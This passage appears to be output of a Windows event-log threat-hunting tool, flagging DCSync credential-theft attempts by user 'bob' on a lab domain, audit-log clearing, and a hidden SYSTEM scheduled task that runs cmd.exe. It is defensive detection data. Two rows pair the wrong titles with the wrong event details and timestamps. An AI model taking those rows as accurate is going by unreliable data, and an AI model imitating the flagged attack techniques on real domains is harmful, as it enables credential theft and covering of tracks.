<UserId>SYSTEM</UserId>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>cmd.exe</Command>
<Arguments>/c echo testing > c:\users\public\out.txt</Arguments>
</Exec>
</Actions>
</Task>
",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242597
Security
DC1.insecurebank.local
30F197FC-BECA-48D6-923E-A52A437119D3
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc
2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14674
",DC1.insecurebank.local,Security
Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242596
Security
DC1.insecurebank.local
30F197FC-BECA-48D6-923E-A52A437119D3
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc
2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14675
",DC1.insecurebank.local,Security
Audit log cleared,1639331872.272432,2021-12-12T21:57:52.272432+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102,"
1102
0
4
104
0
0x4020000000000000
2982081
Security
01566s-win16-ir.threebeesco.com
S-1-5-21-308926384-506822093-3341789130-1106
a-jbrown
3B
0x364f7
",01566s-win16-ir.threebeesco.com,Security
Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242595
Security
DC1.insecurebank.local
AF3067E0-BB6F-47C2-AA20-F3F458797F38
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc
2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14674
",DC1.insecurebank.local,Security
Audit log cleared,1557594610.60807,2020-09-02T15:47:48.570502+04:00,,Audit,Critical,"User Name : ( IEUser ) with process : ( C:\Python27\python.exe ) run from Unusual location , check the number and date of execution in process execution report",4688,"
4688
1
0
13312
0
0x8020000000000000
18196
Security
IEWIN7
S-1-5-21-3583694148-1414552638-2922671848-1000
IEUser
IEWIN7
0x13765
0x4f0
C:\Python27\python.exe
%%1938
0x12c
",01566s-win16-ir.threebeesco.com,Security
Process running in Unusual location,1599047268.570502,2019-05-11T21:10:10.608070+04:00,,Threat,High,Audit log cleared by user ( a-jbrown ),1102,"
1102
0
4
104
0
0x4020000000000000
2171289
Security
01566s-win16-ir.threebeesco.com
S-1-5-21-308926384-506822093-3341789130-1106
a-jbrown
3B
0x38a14
",IEWIN7,Security
Dcsync Attack detected,1553549341.035686,2019-03-26T01:29:01.035686+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242605
Security
DC1.insecurebank.local
9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a
0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
%%14674
",DC1.insecurebank.local,Security
Audit log cleared,1557594610.342445,2019-05-11T21:10:10.342445+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102,"
1102
0
4
104
0
0x4020000000000000
18195
Security
IEWIN7
S-1-5-21-3583694148-1414552638-2922671848-1000
IEUser
IEWIN7
0x1371b
",IEWIN7,Security
Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
5136
0
0
14081
0
0x8020000000000000
198242604
Security
DC1.insecurebank.local
9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96
-
S-1-5-21-738609754-2819869699-4189121830-1108
bob
insecurebank
0x40f2719
insecurebank.local
%%14676
DC=insecurebank,DC=local
C6FAF700-BFE4-452A-A766-424F84C29583
domainDNS
nTSecurityDescriptor
2.5.5.15
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad